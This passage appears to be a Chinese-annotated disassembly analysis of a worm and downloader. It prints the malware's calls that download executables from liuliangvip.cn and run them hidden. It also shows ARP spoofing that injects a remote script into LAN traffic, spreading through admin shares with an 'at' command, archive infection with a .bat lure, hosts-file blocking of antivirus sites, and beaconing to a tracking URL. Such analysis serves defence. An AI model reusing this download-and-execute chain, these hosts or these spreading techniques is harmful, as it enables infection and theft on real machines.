0040437B  |.  5B            pop     ebx
0040437C  |.  81C4 04010000 add     esp, 104
00404382  \.  C3            retn


0040463E  |.  50            push    eax                                    ; /FileName = "urlmon.dll"
0040463F  |.  FF15 74104000 call    dword ptr [<&KERNEL32.LoadLibraryA>]   ; \LoadLibraryA
00404672  |.  50            push    eax                                    ; /ProcNameOrOrdinal = "URLDownloadToFileA"
00404673  |.  FF35 6C744000 push    dword ptr [40746C]                     ; |hModule = 75C60000 (urlmon)
00404679  |.  FF15 70104000 call    dword ptr [<&KERNEL32.GetProcAddress>] ; \GetProcAddress
004043B2  /$  56            push    esi                                    ;  unpacked.004023B8
004043B3  |.  6A 00         push    0
004043B5  |.  BE 74614000   mov     esi, 00406174                          ;  ASCII "C:\WINDOWS\system32\wincap.exe"
004043BA  |.  6A 00         push    0
004043BC  |.  56            push    esi
004043BD  |.  68 94184000   push    00401894                               ;  ASCII "http://www.liuliangvip.cn/down/wincap.exe"
004043C2  |.  6A 00         push    0
004043C4  |.  FF15 88644000 call    dword ptr [406488]                     ;  urlmon.URLDownloadToFileA
004043CA  |.  6A 00         push    0                                      ; /ShowState = SW_HIDE
004043CC  |.  56            push    esi                                    ; |CmdLine = "C:\WINDOWS\system32\wincap.exe"
004043CD  |.  FF15 1C104000 call    dword ptr [<&KERNEL32.WinExec>]        ; \WinExec
004043D3  |.  5E            pop     esi
004043D4  \.  C3            retn
004043D5:用URLDownloadFileA函数将 "http://www.liuliangvip.cn/down/arp.exe"
004043D5  /$  33C0          xor     eax, eax
004043D7  |.  50            push    eax
004043D8  |.  50            push    eax
004043D9  |.  68 70604000   push    00406070                               ;  ASCII "C:\WINDOWS\system32\arps.com"
004043DE  |.  68 90174000   push    00401790                               ;  ASCII "http://www.liuliangvip.cn/down/arp.exe"
004043E3  |.  50            push    eax
004043E4  |.  FF15 88644000 call    dword ptr [406488]                     ;  urlmon.URLDownloadToFileA
004043EA  \.  C3            retn
创建线程0040449C,获取本机IP地址 然后把所在同网段内的.2~.255的机器作为欺骗对象,由系统目录下的arps.com执行%s -idx 0 -ip %s -port 80 -insert \"%s的命令 对局域网内机器进行arp欺骗
004044F2  |.  68 80000000   push    80                                     ; /BufSize = 80 (128.)
004044F7  |.  50            push    eax                                    ; |Buffer
004044F8  |.  FF15 74114000 call    dword ptr [<&WS2_32.#57>]              ; \gethostname获取主机的主机名
004044FE  |.  8D85 ECFEFFFF lea     eax, dword ptr [ebp-114]
00404504      50            push    eax
00404505      FF15 70114000 call    dword ptr [<&WS2_32.#52>]              ;  WS2_32.gethostbyname获取对应主机的信息
0040445F  |.  68 98194000   push    00401998                               ; /<%s> = "<script language=""javascript"" src=""http://www.liuliangvip.cn/down/index.htm""></script>"
00404464  |.  F3:AB         rep     stos dword ptr es:[edi]                ; |
00404466  |.  FF75 08       push    dword ptr [ebp+8]                      ; |<%s> = ""
00404469  |.  66:AB         stos    word ptr es:[edi]                      ; |
0040446B  |.  AA            stos    byte ptr es:[edi]                      ; |
0040446C  |.  8D85 00FFFFFF lea     eax, dword ptr [ebp-100]               ; |
00404472  |.  50            push    eax                                    ; |<%s> = "C:\WINDOWS\system32\arps.com"
00404473  |.  8D85 00FDFFFF lea     eax, dword ptr [ebp-300]               ; |
00404479  |.  68 60234000   push    00402360                               ; |format = "%s  -idx 0 -ip %s -port 80 -insert ""%s"""
0040447E  |.  50            push    eax                                    ; |s
0040447F  |.  E8 661A0000   call    <jmp.&MSVCRT.sprintf>                  ; \sprintf
00404484  |.  83C4 20       add     esp, 20
00404487  |.  8D85 00FDFFFF lea     eax, dword ptr [ebp-300]
0040448D  |.  6A 00         push    0                                      ; /ShowState = SW_HIDE
0040448F  |.  50            push    eax                                    ; |CmdLine = "C:\WINDOWS\system32\arps.com  -idx 0 -ip -port 80 -insert ""<script language=""javascript"" src=""http://www.liuliangvip.cn/down/index.htm""></script>"""
00404490  |.  FF15 1C104000 call    dword ptr [<&KERNEL32.WinExec>]        ; \WinExec


0040476E  |.  50            push    eax                                    ; /pWSAData
0040476F  |.  68 02020000   push    202                                    ; |RequestedVersion = 202 (2.2.)
00404774  |.  FF15 7C114000 call    dword ptr [<&WS2_32.#115>]             ; \WSAStartup
00404B73  |.  53            push    ebx                                 ;0
00404B74  |.  895D E0       mov     dword ptr [ebp-20], ebx
00404B77  |.  FF75 0C       push    dword ptr [ebp+C]                     ;  unpacked.004024F4可选的一个密码
00404B7A  |.  895D E4       mov     dword ptr [ebp-1C], ebx               
00404B7D  |.  897D E8       mov     dword ptr [ebp-18], edi 
00404B80  |.  8975 EC       mov     dword ptr [ebp-14], esi
00404B83  |.  FF75 10       push    dword ptr [ebp+10]             ;Administrator用于连接的用户名
00404B86  |.  895D F8       mov     dword ptr [ebp-8], ebx
00404B89  |.  895D F4       mov     dword ptr [ebp-C], ebx
00404B8C  |.  50            push    eax                          ;NETRESOURCE结构
00404B8D  |.  FF55 FC       call    dword ptr [ebp-4]      ;WNetAddConnection2的地址
主机往每个盘里复制hackshen.exe,然后调用WinExec隐蔽执行"at \\ 16:47 F:\hackshen.exe"这个命令将病毒文件复制到"\admin$\hackshen.exe"


004055AC  |.  6A 00         push    0                                      ; /FailIfExists = FALSE
004055AE  |.  8D8424 180100>lea     eax, dword ptr [esp+118]               ; |
004055B5  |.  53            push    ebx                                    ; |NewFileName => "C:\WINDOWS\Tasks\绿化.bat"
004055B6  |.  50            push    eax                            |ExistingFileName = "C:\Documents and Settings\li\"中华吸血鬼2.2\unpacked.exe"
004055B7  |.  FF15 64104000 call    dword ptr [<&KERNEL32.CopyFileA>]      ; \CopyFileA
00405617  |> /80BC35 FCFEFF>/cmp     byte ptr [ebp+esi-104], 0
0040561F  |. |75 3C         |jnz     short 0040565D
00405621  |. |8A8435 F9FEFF>|mov     al, byte ptr [ebp+esi-107]
00405628  |. |68 64224000   |push    00402264                              ;  ASCII "A:"
0040562D  |. |8845 FC       |mov     byte ptr [ebp-4], al
00405630  |. |8A8435 FAFEFF>|mov     al, byte ptr [ebp+esi-106]
00405637  |. |8845 FD       |mov     byte ptr [ebp-3], al
0040563A  |. |8D45 FC       |lea     eax, dword ptr [ebp-4]
0040563D  |. |50            |push    eax
0040563E  |. |FFD7          |call    edi
00405640  |. |85C0          |test    eax, eax
00405642  |. |74 19         |je      short 0040565D
00405644  |. |8D45 FC       |lea     eax, dword ptr [ebp-4]
00405647  |. |68 60224000   |push    00402260                              ;  ASCII "C:"
0040564C  |. |50            |push    eax
0040564D  |. |FFD7          |call    edi
0040564F  |. |85C0          |test    eax, eax
00405651  |. |74 0A         |je      short 0040565D
00405653  |. |8D45 FC       |lea     eax, dword ptr [ebp-4]
00405656  |. |50            |push    eax
00405657  |. |E8 10000000   |call    0040566C
0040566C:调用ExpandEnvironmentString扩充环境字串,搜索盘中后缀名为:rar、zip、tgz、cab、tar的文件,调用WinExec执行"C:\Program Files\WinRAR\Rar.exe -ep a ""E:\test.rar"" C:\WINDOWS\Tasks\绿化.bat",将病毒文件加入到压缩文件中,当用户解压文件时,诱使用户点击绿化.bat执行病毒程序,真是陷阱多多,阴招不断。


0040510F   .  BE D8274000   mov     esi, 004027D8                         ;  ASCII "http://www.liuliangvip.cn/down/1.exe"  ;木马程序
00405211   .  BE 78264000   mov     esi, 00402678                         ;  ASCII "http://www.liuliangvip.cn/down/10.exe"  ;木马程序
00405281   .  BB 5C714000   mov     ebx, 0040715C                         ;  ASCII "C:\DOCUME~1\li\LOCALS~1\Temp\B3ipPrP5rd.pif"           ;随机的文件名,有00404FAF产生
00405286   .  BD 90010000   mov     ebp, 190
0040528B   >  8D8424 340900>lea     eax, dword ptr [esp+934]
00405292   .  50            push    eax
00405293   .  E8 17FDFFFF   call    00404FAF
{......00404FC1  |.  50            push    eax                                   ; /Buffer00404FC2  |.  68 04010000   push    104                                   ; |BufSize = 104 (260.)00404FC7  |.  FF15 7C104000 call    dword ptr [<&KERNEL32.GetTempPathA>]  ; \GetTempPathA获取临时文件指定的路径......00404FE9  |.  6A 00         push    0                                     ; /timer = NULL00404FEB  |.  AA            stos    byte ptr es:[edi]                     ; |00404FEC  |.  E8 1D0F0000   call    <jmp.&MSVCRT.time>                    ; \time00404FF1  |.  50            push    eax                                   ; /seed00404FF2  |.  E8 110F0000   call    <jmp.&MSVCRT.srand>                   ; \srand00404FF7  |.  8065 F4 00    and     byte ptr [ebp-C], 000404FFB  |.  33C0          xor     eax, eax00404FFD  |.  8D7D F5       lea     edi, dword ptr [ebp-B]00405000  |.  59            pop     ecx00405001  |.  AB            stos    dword ptr es:[edi]00405002  |.  AB            stos    dword ptr es:[edi]00405003  |.  59            pop     ecx00405004  |.  33F6          xor     esi, esi00405006  |.  66:AB         stos    word ptr es:[edi]00405008  |>  E8 F50E0000   /call    <jmp.&MSVCRT.rand>                   ; [rand产生随机的文件名......004050CB  |.  50            push    eax    ;"http://www.liuliangvip.cn/down/3.exe"004050CC  |.  83E1 03       and     ecx, 3004050CF  |.  FF75 08       push    dword ptr [ebp+8]   ;"C:\DOCUME~1\li\LOCALS~1\Temp\B3ipPrP5rd.pif"004050D2  |.  F3:A4         rep     movs byte ptr es:[edi], byte ptr [esi>004050D4  |.  E8 FAFCFFFF   call    00404DD3             ;下载木马程序并重命名为随机的文件名{......00404E7E  |.  8B1D 74104000 mov     ebx, dword ptr [<&KERNEL32.LoadLibrar>;  kernel32.LoadLibraryA00404E84  |.  83C4 0C       add     esp, 0C00404E87  |.  8D85 F0FBFFFF lea     eax, dword ptr [ebp-410]00404E8D  |.  50            push    eax                                   ; /FileName=shell32.dll00404E8E  |.  FFD3          call    ebx                                   ; \LoadLibraryA......00404EE4  |.  8B1D 70104000 mov     ebx, dword ptr [<&KERNEL32.GetProcAdd>;  kernel32.GetProcAddress00404EEA  |.  83C4 0C       add     esp, 0C00404EED  |.  8D85 F8FDFFFF lea     eax, dword ptr [ebp-208]00404EF3  |.  50            push    eax                                   ; /ProcNameOrOrdinal=ShellExecute00404EF4  |.  FF35 68744000 push    dword ptr [407468]                    ; |hModule = NULL00404EFA  |.  FFD3          call    ebx                                   ; \GetProcAddress.......00404F2A  |.  FF35 6C744000 push    dword ptr [40746C]                    ;  urlmon.75C6000000404F30  |.  FFD3          call    ebx......00404F39  |.  51            push    ecx00404F3A  |.  51            push    ecx00404F3B  |.  FF75 0C       push    dword ptr [ebp+C]                       ;ASCII "C:\DOCUME~1\li\LOCALS~1\Temp\bx7EoOJu0B.pif"00404F3E  |.  FF75 08       push    dword ptr [ebp+8]                        ;ASCII "http://www.liuliangvip.cn/down/3.exe"00404F41  |.  51            push    ecx00404F42      FFD0          call    eax                                   ;  urlmon.URLDownloadToFileA下载木马程序}


00405AA8      68 C0270900   push    927C0                          ;10分钟
00405AAD   .  FF15 AC104000 call    dword ptr [<&KERNEL32.Sleep>]    ; \Sleep
00405AB3   .  68 A01C4000   push    00401CA0                         ;  ASCII "http://www.liuliangvip.cn/down/mm.exe"
00405AB8   .  E8 43FEFFFF   call    00405900
{00405900......00405A01  |.  57            push    edi00405A02  |.  57            push    edi00405A03  |.  51            push    ecx       ;ASCII "C:\WINDOWS\meupdate.ini"保存到本地文件名和地址00405A04  |.  68 9C1B4000   push    00401B9C                              ;  ASCII   "http://www.liuliangvip.cn/down/update.ini"网站地址00405A09  |.  57            push    edi00405A0A  |.  A3 04754000   mov     dword ptr [407504], eax                ;  urlmon.URLDownloadToFileA00405A0F      FFD0          call    eax......00405A28  |.  50            push    eax                              ; /stream00405A29  |.  8D85 F0FBFFFF lea     eax, dword ptr [ebp-410]         ; |00405A2F  |.  53            push    ebx                              ; |n00405A30  |.  50            push    eax                              ; |s00405A31  |.  E8 DE040000   call    <jmp.&MSVCRT.fgets>              ; \fgets读出meupdate.ini文件00405A36  |.  83C4 0C       add     esp, 0C00405A39  |.  BE BC284000   mov     esi, 004028BC                    ;  ASCII "2.1"00405A3E  |.  8D85 F0FBFFFF lea     eax, dword ptr [ebp-410]00405A44  |>  8A10          /mov     dl, byte ptr [eax]                  ;文件前3个字符和"2.1"进行比较00405A46  |.  8ACA          |mov     cl, dl00405A48  |.  3A16          |cmp     dl, byte ptr [esi]00405A4A  |.  75 1A         |jnz     short 00405A66                    ;不相同则跳到00405A66更新病毒......00405A6F  |.  57            push    edi00405A70  |.  57            push    edi00405A71  |.  68 A41D4000   push    00401DA4                         ;  ASCII "c:\_default.pif"00405A76  |.  FF75 08       push    dword ptr [ebp+8]                   ;"http://www.liuliangvip.cn/down/mm.exe"00405A79  |.  57            push    edi00405A7A  |.  FF15 04754000 call    dword ptr [407504]               ;  urlmon.URLDownloadToFileA
00405ABD   .  59            pop     ecx
00405ABE   .  6A 00         push    0                                ; /ShowState = SW_HIDE
00405AC0   .  56            push    esi                              ; |CmdLine
00405AC1   .  FF15 1C104000 call    dword ptr [<&KERNEL32.WinExec>]  ; \WinExec
00405AC7   .^ EB DF         jmp     short 00405AA8


00405AEC  |.  68 FF000000   |push    0FF                             ; /DestSizeMax = FF (255.)
00405AF1  |.  50            |push    eax                             ; |DestString
00405AF2  |.  68 AC284000   |push    004028AC                        ; |SrcString = "%ProgramFiles%"
00405AF7  |.  FF15 80104000 |call    dword ptr [<&KERNEL32.ExpandEnv>; \ExpandEnvironmentStringsA
00405B25  |.  68 80000000   |push    80                              ; /FileAttributes = NORMAL
......                                                                ;获取host文件路径相关代码
00405B48  |.  50            |push    eax                             ; |FileName = "C:\WINDOWS\system32\drivers\etc\hosts"
00405B49  |.  F3:A4         |rep     movs byte ptr es:[edi], byte pt>; |
00405B4B  |.  FF15 58104000 |call    dword ptr [<&KERNEL32.SetFileAt>; \SetFileAttributesA
接着查找[url=file://\\drivers\etc\\hosts]\\drivers\etc\\hosts[/url]文件,写入如下数据: 360.qihoo.com
...... dl.jiangmin.com jiangmin.com


0040549B  |.  68 70224000   push    00402270                              ; /mode = "r"
......                                                                     ;路径相关代码
004054BE  |.  50            push    eax                                   ; |path = "C:\WINDOWS\mfxixue.ini"
004054BF  |.  F3:A4         rep     movs byte ptr es:[edi], byte ptr [esi>; |
004054C1  |.  E8 120A0000   call    <jmp.&MSVCRT.fopen>                   ; \fopen打开mfxixue.ini
004054CF  |.  68 981A4000   push    00401A98                              ;  ASCII "http://www.liuliangvip.cn/down/tj/ct.asp"
004054D4  |.  6A 01         push    1
004054D6  |.  E8 ACFEFFFF   call    00405387
{00405387  /$  55            push    ebp......00405392  |.  6A 00         push    0                                     ; /timer = NULL00405394  |.  E8 750B0000   call    <jmp.&MSVCRT.time>                    ; \time00405399  |.  50            push    eax                                   ; /seed0040539A  |.  E8 690B0000   call    <jmp.&MSVCRT.srand>                   ; \srand0040539F  |.  59            pop     ecx004053A0  |.  33F6          xor     esi, esi004053A2  |.  59            pop     ecx004053A3  |>  E8 5A0B0000   /call    <jmp.&MSVCRT.rand>                   ; [rand......004053ED  |.  74 1C         je      short 0040540B004053EF  |.  68 28774000   push    00407728                              ; /<%s> = "qi06AiQ0Cf"004053F4  |.  8D85 FCFEFFFF lea     eax, dword ptr [ebp-104]              ; |004053FA  |.  FF75 0C       push    dword ptr [ebp+C]                     ; |<%s> =   "http://www.liuliangvip.cn/down/tj/ct.asp"004053FD  |.  68 30284000   push    00402830                              ; |format = "%s?mac=%s&ver=2.1"00405402  |.  50            push    eax                                   ; |s00405403  |.  E8 E20A0000   call    <jmp.&MSVCRT.sprintf>                 ; \sprintf00405408  |.  83C4 10       add     esp, 100040540B  |>  8D85 FCFEFFFF lea     eax, dword ptr [ebp-104]00405411  |.  50            push    eax ;eax=0221FD9C, (ASCII "http://www.liuliangvip.cn/down/tj/ct.asp?mac=qi06AiQ0Cf&ver=2.1")00405412  |.  E8 03000000   call    0040541A{0040541A  /$  56            push    esi......00405422  |.  68 28774000   push    00407728                              ;  ASCII "qi06AiQ0Cf"00405427  |.  FF15 64114000 call    dword ptr [<&WININET.InternetOpenA>]  ;  WININET.InternetOpenA初始化应用程序,以使用 WinINet 函数0040542D  |.  8BF8          mov     edi, eax0040542F  |.  3BFE          cmp     edi, esi00405431  |.  74 2F         je      short 0040546200405433  |.  56            push    esi00405434  |.  68 00000080   push    8000000000405439  |.  56            push    esi0040543A  |.  56            push    esi0040543B  |.  FF7424 1C     push    dword ptr [esp+1C];(ASCII "http://www.liuliangvip.cn/down/tj/ct.asp?mac=qi06AiQ0Cf&ver=2.1")
0040543F  |.  57            push    edi00405440  |.  FF15 60114000 call    dword ptr [<&WININET.InternetOpenUrlA>;  WININET.InternetOpenUrlA通过一个完整的HTTP网址打开一个资源00405446  |.  3BC6          cmp     eax, esi00405448  |.  74 11         je      short 0040545B
0040544A  |.  8B35 68114000 mov     esi, dword ptr [<&WININET.InternetClo>;  WININET.InternetCloseHandle
......}00405417  |.  59            pop     ecx00405418  |.  C9            leave00405419  \.  C3            retn








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